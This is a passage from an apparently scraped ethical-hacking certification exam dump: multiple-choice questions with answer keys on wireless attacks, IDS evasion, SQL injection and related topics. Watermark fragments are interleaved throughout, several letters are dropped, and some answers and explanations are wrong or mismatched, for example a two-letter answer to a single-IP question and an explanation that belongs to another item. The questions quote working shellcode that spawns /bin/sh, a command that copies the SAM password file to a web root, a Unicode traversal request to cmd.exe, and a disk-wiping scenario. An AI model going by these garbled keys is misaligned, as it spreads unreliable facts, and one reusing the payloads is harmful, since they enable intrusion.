networks available. fter about an hour of trying to figure it out, Jeffery cannot get on the company's
wireless network. Discouraged, Jeffery leaves the office and goes home.
m
The next day, Jeffery calls his friend who works with computers. His friend suggests that his IT
.co
department might have turned off SSID broadcasting, and that is why he could not see any
wireless networks.
sts
How would Jeffrey access the wireless network?
A. Jam the wireless signal by launching denial of service attack

lTe
B. Attempt to connect using wireless device default SSIDs

C. Run WEPCrack tool and brute force the SSID hashes
D. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext
tua
Answer: D
Ac
QUESTION NO: 236
Which of the following built-in C/C++ functions you should avoid to prevent your program from
buffer overflow attacks?
A. strsock()
B. strcpy()
C. streadd()
D. strcat()
Answer: B,C,D
Explanation:

When hunting buffer overflows, the first thing to look for is functions which write into arrays without
any way to know the amount of space available. If you get to define the function, you can pass a
length parameter in, or ensure that every array you ever pass to it is at least as big as the hard-
coded maximum amount it will write. If you're using a function someone else (like, say, the
compiler vendor) has provided then avoiding functions like gets(), which take some amount of data
over which you have no control and stuff it into arrays they can never know the size of, is a good
start. Make sure that functions like the str...() family which expect NUL-terminated strings actually
get them - store a '\0' in the last element of each array involved just before you call the function, if
necessary. Strscock() is not a valid C/C++ function.
QUESTION NO: 237
Ethernet switches can be adversely affected by rapidly bombarding them with spoofed ARP
responses. he port to MAC address table (CAM TABLE) overflows on the switch, and rather than
m
failing completely, moves into broadcast mode, then the hacker can sniff all of the packets on the
network.
.co
Which of the following tool achieves this?
sts
A. ./sniffof
B. ./dsniff
C. ./switchsnarf
lTe
D. ./macof
Answer: D
tua
Explanation:
macof floods the local network with random MAC addresses (causing some switches to fail
open in repeating mode, facilitating sniffing).
Ac
QUESTION NO: 238
What does this symbol mean?

A. WPA encrypted access point

B. WEP encrypted access point
C. Open access point
m
D. Closed access point
Answer: C
Explanation:
.co
This symbol is a "warchalking" symbol for a open node (open circle) with the SSID tsunami and
sts
the bandwidth 2.0 Mb/s
lTe
QUESTION NO: 239
Based on the following extract from the log of a compromised machine, what is the hacker really
tua
trying to steal?
c:\> cmd /c type c:\winnt\repair\sam > c:\har.txt

Ac
Volume in drive C has no label.

Volume Serial Number is 8403-6A0E
Directory of C:\
11/26/00 12:34p 0 AUTOEXEC.BAT
11/26/00 06:57p 322 boot.ini
11/26/00 12:34p CONFIG.SYS
12/26/00 07:36p < DIR > exploits
02/04/01 07:07a 5,327 har.txt
12/07/00 03:30p < DIR > InetPub
12/07/00 03:12p < DIR > Multimedia Files
12/26/00 07:10p < DIR > New Folder
01/26/01 02:10p 78,643,200 pagefile.sys
12/21/00 08:59p < DIR > Program Files
02/04/01 06:49a 69 README.NOW.Hax0r
12/21/00 08:59p < DIR > TEMP
02/04/01 07:05a < DIR > WINNT
12/26/00 07:09p < DIR > wiretrip
02/04/01 06:43a 0 mine.txt
15 File(s) 78,648,918 bytes
1,689,455,616 bytes free
c:\> type har.txt
c:\> copy har.txt c:\inetpub\wwwroot

c:\> GET har.txt HTTP/1.1
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:11:28 GMT
Content-Type: text/plain
Accept-Ranges: bytes
m
Last-Modified: Sun, 04 Feb 2001 13:07:33 GMT
ETag: "5063fd6fab8ec01:b85"
Content-Length: 5327
.co
A. har.txt
sts
B. Repair file
C. SAM file
D. wwwroot
lTe
Answer: C
tua
Explanation:
He is actually trying to get the file har.txt but this file contains a copy of the SAM file.
Ac
QUESTION NO: 240
On wireless networks, a SSID is used to identify the network. Why are SSID not considered to be
a good security mechanism to protect a wireless network?
A. The SSID is the same as the MAC address for all vendors
B. The SSID is only 32 bits in length
C. The SSID is to identify a station, not a network
D. The SSID is transmitted in clear text
Answer: D
Explanation:

The SSID IS constructed to identify a network, it IS NOT the same as the MAC address and
SSID's consists of a maximum of 32 alphanumeric characters.
QUESTION NO: 241
You are trying to compromise a Linux machine and steal the password hashes for cracking with
password brute forcing program. Where is the password file kept in Linux?
A. /etc/passwd
B. /bin/shadow
C. /bin/password
D. /etc/shadow
Answer: D
m
Explanation:
/etc/shadow file stores actual password in encrypted format for user's account with additional
.co
properties related to user password i.e. it stores secure user account information. All fields are
separated by a colon (:) symbol. It contains one entry per line for each user listed in /etc/passwd
file.
sts
lTe
QUESTION NO: 242
You are the security administrator for a large online auction company based out of Los
Angeles.After getting your ENSA CERTIFICATION last year, you have steadily been fortifying your
tua
network's security including training, OS hardening, and network security.One of the last things
you just changed for security reasons was to modify all the built-in administrator accounts on the
local computers of PCs and in Active Directory.After thorough testing, you found that no services
Ac
or programs were affected by the name changes.
Your company undergoes an outside security audit by a consulting company, and they said that
even though all the administrator account names were changed, the accounts could still be used
by a clever hacker to gain unauthorized access.You argue with the auditors and say that is not
possible, so they use a tool and show you how easy it is to utilize the administrator account even
though its name was changed.
What tool did the auditors use?
A. Sid2user
B. User2sid
C. Fingerprint

D. GetAcct
Answer: A
Explanation:
User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a
remote machine Sid2user.exe can then be used to retrieve the names of all the user accounts and
more.
QUESTION NO: 243
In order to attack a wireless network, you put up an access point and override the signal of the real
access point. As users send authentication data, you are able to capture it. What kind of attack is
this?
m
A. WEP attack
B. Drive by hacking
C. Unauthorized access point attack
.co
D. Rogue access point attack
sts
Answer: D
Explanation:
lTe
The definition of a Rogue access point is: 1. A wireless access point (AP) installed by an
employee without the consent of the IT department. Without the proper security configuration,
users have exposed their company's network to the outside world. 2. An access point (AP) set up
tua
by an attacker outside a facility with a wireless network. Also called an "evil twin," the rogue AP
picks up beacons (signals that advertise its presence) from the company's legitimate AP and
transmits identical beacons, which some client machines inside the building associate with.
Ac
QUESTION NO: 244
A distributed port scan operates by:
A. Using denial-of-service software against a range of TCP ports

B. Having multiple computers each scan a small number of ports, then correlating the results
C. Blocking access to the targeted host by each of the distributed scanning clients
D. Blocking access to the scanning clients by the targeted host
Answer: B
Explanation:

Think of dDoS (distributed Denial of Service) where you use a large number of computers to
create simultaneous traffic against a victim in order to shut them down.
QUESTION NO: 245
You are the security administrator for a large network. You want to prevent attackers from running
any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible
areas of the network. How can you achieve this?
A. There is no way to completely block tracerouting into this area

B. Block ICMP at the firewall
C. Block TCP at the firewall
D. Block UDP at the firewall
Answer: A
m
Explanation:
.co
If you create rules that prevents attackers to perform traceroutes to your DMZ then you'll also
prevent anyone from accessing the DMZ from outside the company network and in that case it is
not a DMZ you have.
sts
lTe
QUESTION NO: 246
You receive an e-mail with the below message:

tua
Hello Steve,
We are having technical difficulty in restoring user database records after the recent blackout.
Ac
Your account data is corrupted. Please logon on to SuperEmailServices.com and change your
password.
http://www.superemailservices.com%40c3405906949/support/logon.htm
If you do not reset your password within 7 days, your account will be permanently disabled locking
you out from using our e-mail services.
Sincerely,
Technical Support
uperEmailServices
From this e-mail you suspect that some hacker sent this message since you have been using their
e-mail services for the last 2 years and they never have sent out an e-mail such as this. You also
observe the URL in the message and want to confirm your suspicion about 3405906949, which
looks like a base10 number. You enter the following at the Windows 2003 command prompt:
ping 3405906949
You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL?
A. 199.23.43.4
B. 203.2.4.5
C. 192.34.5.9
D. 10.0.3.4
Answer: A,B
Explanation:
0x stands for hexadecimal and DE=222, AD=173, BE=190 and EF=239
m
Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into a
detection engine and rely on the pattern matching and/or statistical analysis to determine what is
sts
malicious. Packets are not processed by the host's TCP/IP stack allowing the NIDS to analyze
traffic the host would otherwise discard. Which of the following tools allows an attacker to
lTe
intentionally craft packets to confuse pattern-matching NIDS systems, while still being correctly
assembled by the host TCP/IP stack to render the attack payload?
A. Defrag
tua
B. Fragroute
C. Tcpfrag
D. Tcpdump
Ac
Answer: B
Explanation:
fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host,
implementing most of the attacks described in the Secure Networks "Insertion, Evasion, and
Denial of Service: Eluding Network Intrusion Detection" paper of January 1998. It features a
simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment,
source-route, or otherwise monkey with all outbound packets destined for a target host, with
minimal support for randomized or probabilistic behaviour. This tool was written in good faith to aid
in the testing of network intrusion detection systems, firewalls, and basic TCP/IP stack behaviour.

QUESTION NO: 248
Shauna is the Senior Security Analyst for the Department of Defense, in charge of all aspects of
the DoD's internal network security.As one would expect, the DoD is constantly probed and
scanned by outside IP addresses, trying to find an entry into the network.Shauna leads a large
team of junior security analysts that make sure all entry points are closed off, unless that entry
point must be kept open for business purposes.If something must be kept open, Shauna and her
employees' duty is to make sure that hole is not exploited by outside attackers.
One way that this is accomplished, is to not use traditional ports for normally used services.All
employees and outside contractors that must obtain remote access for work, are notified of the
non-standard ports, and thus are able to gain access.The traditional ports used for services like
http are actually kept open, but they are redirected to a secure logical area and logged.These logs
enable Shauna and her team to analyze who is trying to obtain unauthorized access, and
prosecute if necessary.
m
What technique is Shauna using here?
A. Honeypot
.co
B. Firewalking
sts
C. Tunneling
D. Obfuscation
lTe
Answer: A
tua
QUESTION NO: 249
Mason is the network administrator of ata Machine Systems, Inc. He has been pushed aside in
promotions due to office politics. He wants to take revenge on his oss, Matthew Smith. Being a
Ac
disgruntled employee, Mason sneaks into Matthew's office one night and boots his boss's
computer with the Knoppix CD-ROM and intends to erase the contents of his oss's hard disk
including the partition table without leaving any trace of his action. He intends to make the hard
disk data unrecoverable even to forensics team.
Which of the following command Mason should run in Knoppix to permanently erase the data?
A. $ delete -fik /dev/hda1

B. $ wipe -fik /dev/hda1
C. $ erase -fik /dev/hda1
D. $ secdel -fik /dev/hda1
Answer: B

QUESTION NO: 250
Study the log given below and answer the following questions.
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169

Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
m
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
.co
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by
simple(uid=506)
sts
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080

Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
lTe
Interpret the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 ->
172.16.1.107:53
tua
A. A buffer overflow attempt

B. A DNS zone transfer
C. Data being retrieved from 63.226.81.13
Ac
D. An IDS evasion technique
Answer: A
Explanation:
The IDS log file is depicting numerous attacks, however,most of them arefrom different attackers,
in reference to the attack in question, he is trying to mask his activity by trying to act legitimate,
during his session on the honeypot, he changes users two times by using the"su" command, but
never triess toattempt anything to severe.
QUESTION NO: 251
When writing shellcodes, you must avoid ____________ because these will end the string.

charhellcode[]
f11 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
f11 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
f11 "\x80\xe8\xdc\xff\xff\xff/bin/sh";
voidain()?
{ int?ret;
f11 ?
ret??int?)&ret??;
f11 ?
(*ret)??int)shellcode;
}
A. Null bytes
B. Root bytes
C. Unicode bytes
m
D. Char bytes
Answer: A .co
Explanation:
sts
The null character (also null terminator ) is a character with the value zero, present in the ASCII
and Unicode character sets, and available in nearly all mainstream programming languages. The
original meaning of this character was like NOP - when sent to a printer or a terminal, it does
lTe
nothing (some terminals, however, incorrectly display it as space). Strings ending in a null
character are said to be null-terminated .
tua
QUESTION NO: 252
William has received a Tetris game from someone in his computer programming class through
Ac
email.William does not really know the person who sent the game very well, but decides to install
the game anyway because he really likes Tetris.
After William installs the game, he plays it for a couple of hours.The next day, William plays the
Tetris game again and notices that his machine has begun to slow down.?He brings up his Task
Manager and sees the following programs running (see screenshot):
What has William just installed?

m
.co
sts
lTe
tua
Ac
A. Zombie Zapper (ZoZ)

B. Root Digger (RD)
C. Bot IRC Tunnel (BIT)

D. Remote Access Trojan (RAT)
Answer: D
Explanation:
RATs are malicious programs that run invisibly on host PCs and permit an intruder remote access
and control. On a basic level, many RATs mimic the functionality of legitimate remote control
programs such as Symantec's pcAnywhere but are designed specifically for stealth installation
and operation. Intruders usually hide these Trojan horses in games and other small programs that
unsuspecting users then execute on their PCs. Typically, exploited users either download and
execute the malicious programs or are tricked into clicking rogue email attachments.
QUESTION NO: 253
This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments and
m
the IDS will not spot the true nature of the fully assembled datagram. The datagram is not
.co
reassembled until it reaches its final destination. It would be a processor-intensive task for an IDS
to reassemble all fragments itself, and on a busy system the packet will slip through the IDS onto
the network.
sts
What is this technique called?

lTe
A. IP Splicing or Packet Reassembly

B. IP Routing or Packet Dropping
C. IDS Spoofing or Session Assembly
tua
D. IP Fragmentation or Session Splicing
Answer: D
Ac
Explanation:
The basic premise behind session splicing, or IP Fragmentation, is to deliver the payload over
multiple packets thus defeating simple pattern matching without session reconstruction. This
payload can be delivered in many different manners and even spread out over a long period of
time. Currently, Whisker and Nessus have session splicing capabilities, and other tools exist in the
wild.
QUESTION NO: 254
You went to great lengths to install all the necessary technologies to prevent hacking attacks, such
as expensive firewalls, antivirus software, antispam systems and intrusion detection/prevention
tools in your company's network. You have configured the most secure policies and tightened
every device on your network. You are confident that hackers will never be able to gain access to

your network with complex security system in place.
Your peer, Peter Smith who works at the same department disagrees with you. He says even the
best network security technologies cannot prevent hackers gaining access to the network because
of presence of "weakest link" in the security chain.
What is Peter Smith talking about?
A. Untrained staff or ignorant computer users who inadvertently become the weakest link in your
security chain
B. Continuous Spam e-mails cannot be blocked by your security system since spammers use
different techniques to bypass the filters in your gateway
C. "zero-day" exploits are the weakest link in the security chain since the IDS will not be able to
detect these attacks
D. "Polymorphic viruses" are the weakest link in the security chain since the Anti-Virus scanners
m
will not be able to detect these attacks
Answer: A .co
sts
QUESTION NO: 255
Pearls Productions, an e-commerce website (http://www. pearl-productions-shop.com) uses a

lTe
cookie to keep a user session active once a user has logged in. When a user successfully logs in
to the application, a cookie is sent to the client containing the user ID, and this is referred to when
the user requests certain functions from the server to make sure that the user has certain rights.
tua
How would you compromise this system, which relies on cookie-based security?
A. Delete the cookie and reestablish connection to the server and access higher level privileges
Ac
B. Intercept the communication between the client and the server and change the cookie to make
the server believe that there is a user with higher privileges
C. Brute force the encryption used by the cookie and replay it back to the server
D. Inject the cookie ID into the web URL and connect back to the server
Answer: B
QUESTION NO: 256
What is the problem with this ASP script (login.asp)?
<%

Set objConn = CreateObject("ADODB.Connection")
objConn.Open Application("WebUsersConnection")
sSQL="SELECT * FROM Users where Username='" & Request("user") & _

"' and Password='" & Request("pwd") & "'"
Set RS = objConn.Execute(sSQL)
If RS.EOF then
Response.Redirect("login.asp?msg=Invalid Login")
Else
Session.Authorized = True
Set RS = nothing
Set objConn = nothing
Response.Redirect("mainpage.asp")
m
End If
%>
.co
A. The ASP script is vulnerable to Cross Site Scripting attack
sts
B. The ASP script is vulnerable to XSS attack
C. The ASP script is vulnerable to SQL Injection attack
D. The ASP script is vulnerable to Session Splice attack
lTe
Answer: C
tua
QUESTION NO: 257

Ac
You are the security administrator of Jaco Banking Systems located in Boston. You are setting up
e-banking website (http://www.ejacobank.com) authentication system. Instead of issuing banking
customer with a single password, you give them a printed list of 100 unique passwords. Each time
the customer needs to log into the e-banking system website, the customer enters the next
password on the list. If someone sees them type the password using shoulder surfing, MiTM or
keyloggers, then no damage is done because the password will not be accepted a second time.
Once the list of 100 passwords is almost finished, the system automatically sends out a new
password list by encrypted e-mail to the customer.
You are confident that this security implementation will protect the customer from password abuse.
Two months later, a group of hackers called "HackJihad" found a way to access the one-time
password list issued to customers of Jaco Banking Systems. The hackers set up a fake website
(http://www.e-jacobank.com) and used phishing attacks to direct ignorant customers to it. The fake

website asked users for their e-banking username and password, and the next unused entry from
their one-time password sheet. The hackers collected 200 customer's username/passwords this
way. They transferred money from the customer's bank account to various offshore accounts.
Your decision of password policy implementation has cost the bank with USD 925,000 to hackers.
You immediately shut down the e-banking website while figuring out the next best security
solution.
What effective security solution will you recommend in this case?
A. Implement Biometrics based password authentication system. Record the customers face
image to the authentication database
B. Configure your firewall to block logon attempts of more than three wrong tries
C. Enable a complex password policy of 20 characters and ask the user to change the password
immediately after they logon and do not store password histories
m
D. Implement RSA SecureID based authentication system
Answer: D .co
sts
QUESTION NO: 258
How does traceroute map the route a packet travels from point A to point B?
lTe
A. It uses a protocol that will be rejected by gateways on its way to the destination
B. It manipulates the flags within packets to force gateways into generating error messages
tua
C. It uses a TCP timestamp packet that will elicit a time exceeded in transit message
D. It manipulates the value of the time to live (TTL) within packet to elicit a time exceeded in transit
message
Ac
Answer: D
Explanation:
Traceroute works by increasing the "time-to-live" value of each successive batch of packets sent.
The first three packets have a time-to-live (TTL) value of one (implying that they make a single
hop). The next three packets have a TTL value of 2, and so on. When a packet passes through a
host, normally the host decrements the TTL value by one, and forwards the packet to the next
host. When a packet with a TTL of one reaches a host, the host discards the packet and sends an
ICMP time exceeded (type 11) packet to the sender. The traceroute utility uses these returning
packets to produce a list of hosts that the packets have traversed en route to the destination.
QUESTION NO: 259

Study the following log extract and identify the attack.
12/26-07:06:01.155349 128.173.37.135:1443 -> 172.16.1.106:80

TCP TTL:13 TOS:0x40 ID:35491 IpLen:20 DgmLen:493 DF
***AP*** Seq: 0x2BDC107 Ack: 0x1CB9F186 Win: 0x2238 TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E GET /msadc/.....
2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F ./....../....../
77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A md.exe?/c+dir+c:
5C 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 \ HTTP/1.1..Acce
70 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C 20 69 pt: image/gif, i
6D 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 2C 20 mage/x-xbitmap
69 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D 61 67 image/jpeg, imag
65 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 63 61 e/pjpeg, applica
74 69 6F 6E 2F 76 6E 64 2E 6D 73 2D 65 78 63 65 tion/vnd.ms-exce
m
6C 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6D l, application/m
73 77 6F 72 64 2C 20 61 70 70 6C 69 63 61 74 69 sword, applicati
.co
6F 6E 2F 76 6E 64 2E 6D 73 2D 70 6F 77 65 72 70 on/vnd.ms-powerp
6F 69 6E 74 2C 20 2A 2F 2A 0D 0A 41 63 63 65 70 oint, */*..Accep
sts
74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 t-Language: en-u
73 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 s..Accept-Encodi
6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 ng: gzip, deflat
lTe
65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D e..User-Agent: M
6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 ozilla/4.0 (comp
61 74 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 atible; MSIE 5.0
tua
31 3B 20 57 69 6E 64 6F 77 73 20 39 35 29 0D 0A 1; Windows 95)..
48 6F 73 74 3A 20 6C 61 62 2E 77 69 72 65 74 72 Host: lib.bvxttr
69 70 2E 6E 65 74 0D 0A 43 6F 6E 6E 65 63 74 69 ip.org..Connecti
Ac
6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A on: Keep-Alive..
43 6F 6F 6B 69 65 3A 20 41 53 50 53 45 53 53 49 Cookie: ASPSESSI
4F 4E 49 44 47 51 51 51 51 51 5A 55 3D 4B 4E 4F ONIDGQQQQQZU=KNO
48 4D 4F 4A 41 4B 50 46 4F 50 48 4D 4C 41 50 4E HMOJAKPFOPHMLAPN
49 46 49 46 42 0D 0A 0D 0A 41 50 4E 49 46 49 46 IFIFB....APNIFIF
42 0D 0A 0D 0A B....
A. Cross Site Scripting

B. Hexcode Attack
C. Unicode Directory Traversal Attack
D. Multiple Domain Traversal Attack
Answer: C

Explanation:
The "Get /msadc/....../....../....../winnt/system32/cmd.exe?" shows that a Unicode Directory
Traversal Attack has been performed.
QUESTION NO: 260
What does the following command in "Ettercap" do?
ettercap -NCLzs --quiet
A. This command will provide you the entire list of hosts in the LAN
B. This command will detach ettercap from console and log all the sniffed passwords to a file
C. This command will check if someone is poisoning you and will report its IP
D. This command broadcasts ping to scan the LAN instead of ARP request all the subnet IPs
m
Answer: B
Explanation:
.co
-L specifies that logging will be done to a binary file and -s tells us it is running in script mode.
sts
QUESTION NO: 261

lTe
John runs a Web server, IDS and firewall on his network. Recently his Web server has been under
constant hacking attacks. He looks up the IDS log files and sees no intrusion attempts but the
Web server constantly locks up and needs rebooting due to various brute force and buffer
tua
overflow attacks but still the IDS alerts no intrusion whatsoever.
John becomes suspicious and views the Firewall logs and he notices huge SSL connections
Ac
constantly hitting his Web server.
Hackers have been using the encrypted HTTPS protocol to send exploits to the Web server and
that was the reason the IDS did not detect the intrusions.
How would John protect his network from these types of attacks?
A. Install a proxy server and terminate SSL at the proxy

B. Enable the Firewall to filter encrypted HTTPS traffic
C. Enable the IDS to filter encrypted HTTPS traffic
D. Install a hardware SSL "accelerator" and terminate SSL at this layer
Answer: A,D

Explanation:
By terminating the SSL connection at a proxy or a SSL accelerator and then use clear text the
distance between the proxy/accelerator and the server, you make it possible for the IDS to scan
the traffic.
QUESTION NO: 262
Bob reads an article about how insecure wireless networks can be. He gets approval from his
management to implement a policy of not allowing any wireless devices on the network. What
other steps does Bob need to take to successfully implement this?
A. Disable all wireless protocols at the firewall

B. Disable SNMP on the network so wireless devices cannot be configured
C. Continuously survey the area for wireless devices
m
D. Purchase a device that jams wireless signals
E. Train users in the new policy
Answer: C,E
.co
Explanation:
sts
If someone installs a access point and connect it to the network there is no way to find it unless
you are constantly surveying the area for wireless devices. SNMP and firewalls can not prevent
lTe
the installation of wireless devices on the corporate network.

tua
QUESTION NO: 263
Which of the following is not considered to be a part of active sniffing?

Ac
A. MAC Duplicating
B. SMAC Fueling
C. ARP Spoofing
D. MAC Flooding
Answer: B
QUESTION NO: 264
The SYN flood attack sends TCP connections requests faster than a machine can process them.
Attacker creates a random source address for each packet

SYN flag set in each packet is a request to open a new connection to the server from the spoofed
IP address
Victim responds to spoofed IP address, then waits for confirmation that never arrives (timeout wait
is about 3 minutes)
Victim's connection table fills up waiting for replies and ignores new connections
Legitimate users are ignored and will not be able to access the server
How do you protect your network against SYN Flood attacks?
A. Stack Tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN floods.
Reduce the timeout before a stack frees up the memory allocated for a connection
B. Check the incoming packet's IP address with the SPAM database on the Internet and enable
the filter using ACLs at the Firewall
C. RST cookies - The server sends a wrong SYN/ACK back to the client. The client should then
generate a RST packet telling the server that something is wrong. At this point, the server knows
the client is valid and will now accept incoming connections from that client normally
D. Micro Blocks. Instead of allocating a complete connection, simply allocate a micro-record of 16-
m
bytes for the incoming SYN object
E. SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully constructed
.co
sequence number generated as a hash of the clients IP address, port number, and other
information. When the client responds with a normal ACK, that special sequence number will be
included, which the server then verifies. Thus, the server first allocates memory on the third packet
sts
of the handshake, not the first
Answer: A,C,D,E
lTe
Explanation:
All above helps protecting against SYN flood attacks. Most TCP/IP stacks today are already
tua
tweaked to make it harder to perform a SYN flood DOS attack against a target.
Ac
QUESTION NO: 265
While investigating a claim of a user downloading illegal material, the investigator goes through
the files on the suspect's workstation. He comes across a file that is just called "file.txt" but when
he opens it, he finds the following:
#define MAKE_STR_FROM_RET(x)
((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)
char infin_loop[]= /* for testing purposes */
"\xEB\xFE";
char bsdcode[] = /* Lam3rZ chroot() code by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"

"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
m
What can he infer from this file?
.co
A. A picture that has been renamed with a .txt extension
B. An encrypted file
C. A uuencoded file
sts
D. A buffer overflow
Answer: D
lTe
Explanation:
This is a buffer overflow exploit with its "payload" in hexadecimal format.
tua
QUESTION NO: 266

Ac
Reflective DDoS attacks do not send traffic directly at the targeted host. Instead, they usually
spoof the originating IP addresses and send the requests at the reflectors. These reflectors
(usually routers or high-powered servers with a large amount of network resources at their
disposal) then reply to the spoofed targeted traffic by sending loads and loads of data to the final
target.
How would you detect these reflectors on your network?
A. Run Vulnerability scanner on your network to detect these reflectors

B. Run floodnet tool to detect these reflectors
C. Look for the banner text by running Zobbie Zappers tools
D. Scan the network using Nmap for the services used by these reflectors

Answer: D
QUESTION NO: 267
Which type of attack is port scanning?
A. Information gathering
B. Denial of service attack
C. Unauthorized access
D. Web server attack
Answer: A
m
QUESTION NO: 268
One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to
.co
the broadcast or the network address. The request would be broadcasted to all hosts on the
targeted network. The live hosts will send an ICMP ECHO Reply to the attacker's source IP
address.
sts
You send a ping request to the broadcast address 192.168.5.255.

lTe
[root@ceh/root]# ping -b 192.168.5.255

WARNING: pinging broadcast address
tua
PING 192.168.5.255 (192.168.5.255) from 192.168.5.1 : 56(84) bytes of data.

64 bytes from 192.168.5.1: icmp_seq=0 ttl=255 time=4.1 ms
64 bytes from 192.168.5.5: icmp_seq=0 ttl=255 time=5.7 ms
Ac
---
---
---
There are 40 computers up and running on the target network. Only 13 hosts send a reply while
others do not. Why?
A. You cannot ping a broadcast address. The above scenario is wrong.

B. You should send a ping request with this command ping 192.168.5.0-255
C. Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO
request aimed at the broadcast address or at the network address.
D. Linux machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request
aimed at the broadcast address or at the network address.

Answer: C
Explanation:
As stated in the correct option, Microsoft Windows does not handle pings to a broadcast address
correctly and therefore ignores them.
QUESTION NO: 269
Larry is a criminal hacker with over 20 years of experience in breaking into systems. Larry's main
objective used to entail defacing government and big corporation websites with information they
did not want released to the public. But within the last few years, Larry has found avenues of
creating revenue through breaking into systems and selling the information. On numerous
occasions, Larry was able to break into the networks of small local banks and glean sensitive
customer information including names, social security numbers, bank account numbers, and PINs.
m
Larry then sold this information through covert channels to dummy corporations based in Eastern
Europe where cyber-law has not matured yet. Larry has been able to cover his tracks in the past,
.co
but with the rise of new technology such as honeypots, Larry is concerned about falling into traps
set by security professionals.
sts
What tool could Larry use to help evade traps like honeypots?
A. Honeyd evasion server

lTe
B. Send-Safe proxy server

C. SPECTER relay server
D. KFSensor tunneling server
tua
Answer: B
Ac
QUESTION NO: 270
How would you prevent session hijacking attacks?
A. Using non-Internet protocols like http secures sessions against hijacking

B. Using biometrics access tokens secures sessions against hijacking
C. Using hardware-based authentication secures sessions against hijacking
D. Using unpredictable sequence numbers secures sessions against hijacking
Answer: D
Explanation:
Protection of a session needs to focus on the unique session identifier because it is the only thing
that distinguishes users. If the session ID is compromised, attackers can impersonate other users
